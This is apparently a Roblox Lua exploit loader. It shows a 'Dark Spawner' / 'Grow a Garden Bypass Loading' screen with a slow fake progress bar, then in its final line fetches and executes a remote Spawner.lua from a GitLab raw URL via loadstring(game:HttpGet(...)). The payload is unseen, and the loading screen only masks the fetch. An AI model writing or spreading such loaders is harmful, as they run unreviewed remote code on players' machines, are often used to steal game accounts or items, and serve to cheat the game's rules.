-- Create ScreenGui
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "LoadingScreen"
screenGui.IgnoreGuiInset = true
screenGui.ResetOnSpawn = false
screenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

-- Background
local bg = Instance.new("Frame")
bg.Size = UDim2.new(1, 0, 1, 0)
bg.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
bg.Parent = screenGui

-- STAR FIELD EFFECT
local starFolder = Instance.new("Folder", bg)
starFolder.Name = "Stars"

local function createStar()
	local star = Instance.new("Frame")
	star.Size = UDim2.new(0, math.random(1,3), 0, math.random(1,3))
	star.Position = UDim2.new(math.random(), 0, math.random(), 0)
	star.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	star.BorderSizePixel = 0
	star.Parent = starFolder

	-- Movement
	task.spawn(function()
		while star.Parent do
			star.Position = star.Position + UDim2.new(0, 0, 0.002, 0)
			if star.Position.Y.Scale > 1 then
				star.Position = UDim2.new(math.random(), 0, 0, 0)
			end
			task.wait(0.03)
		end
	end)
end

-- Spawn stars
for i = 1, 100 do
	createStar()
end

-- Title
local title = Instance.new("TextLabel")
title.Text = "Dark Spawner"
title.AnchorPoint = Vector2.new(0.5, 0.5)
title.Position = UDim2.new(0.5, 0, 0.35, 0)
title.Size = UDim2.new(0.8, 0, 0.1, 0)
title.BackgroundTransparency = 1
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.TextScaled = true
title.Font = Enum.Font.GothamBold
title.ZIndex = 2
title.Parent = bg

-- Progress Bar Background
local barBg = Instance.new("Frame")
barBg.AnchorPoint = Vector2.new(0.5, 0.5)
barBg.Position = UDim2.new(0.5, 0, 0.5, 0)
barBg.Size = UDim2.new(0.6, 0, 0.03, 0)
barBg.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
barBg.BorderSizePixel = 0
barBg.ZIndex = 2
barBg.Parent = bg

-- Progress Bar Fill
local barFill = Instance.new("Frame")
barFill.Size = UDim2.new(0, 0, 1, 0)
barFill.BackgroundColor3 = Color3.fromRGB(0, 102, 255)
barFill.BorderSizePixel = 0
barFill.ZIndex = 2
barFill.Parent = barBg

-- Percentage Label
local percent = Instance.new("TextLabel")
percent.AnchorPoint = Vector2.new(0.5, 0)
percent.Position = UDim2.new(0.5, 0, 1.2, 0)
percent.Size = UDim2.new(0.3, 0, 0.05, 0)
percent.BackgroundTransparency = 1
percent.TextColor3 = Color3.fromRGB(255, 255, 255)
percent.TextScaled = true
percent.Font = Enum.Font.Gotham
percent.Text = "0%"
percent.ZIndex = 2
percent.Parent = barBg

-- Subtitle
local subtitle = Instance.new("TextLabel")
subtitle.Text = "Grow a Garden Bypass Loading"
subtitle.AnchorPoint = Vector2.new(0.5, 0.5)
subtitle.Position = UDim2.new(0.5, 0, 0.6, 0)
subtitle.Size = UDim2.new(0.8, 0, 0.05, 0)
subtitle.BackgroundTransparency = 1
subtitle.TextColor3 = Color3.fromRGB(200, 200, 200)
subtitle.TextScaled = true
subtitle.Font = Enum.Font.Gotham
subtitle.ZIndex = 2
subtitle.Parent = bg

-- Slow Smooth Loading Logic
for i = 1, 1000 do
	barFill.Size = UDim2.new(i/1000, 0, 1, 0)
	percent.Text = math.floor(i/10).."%"
	task.wait(0.02) -- ~20s
end

-- Remove after loading
task.wait(1)
screenGui:Destroy()

-- Run your script after loading screen ends
loadstring(game:HttpGet("https://gitlab.com/darkiedarkie/dark/-/raw/main/Spawner.lua"))()
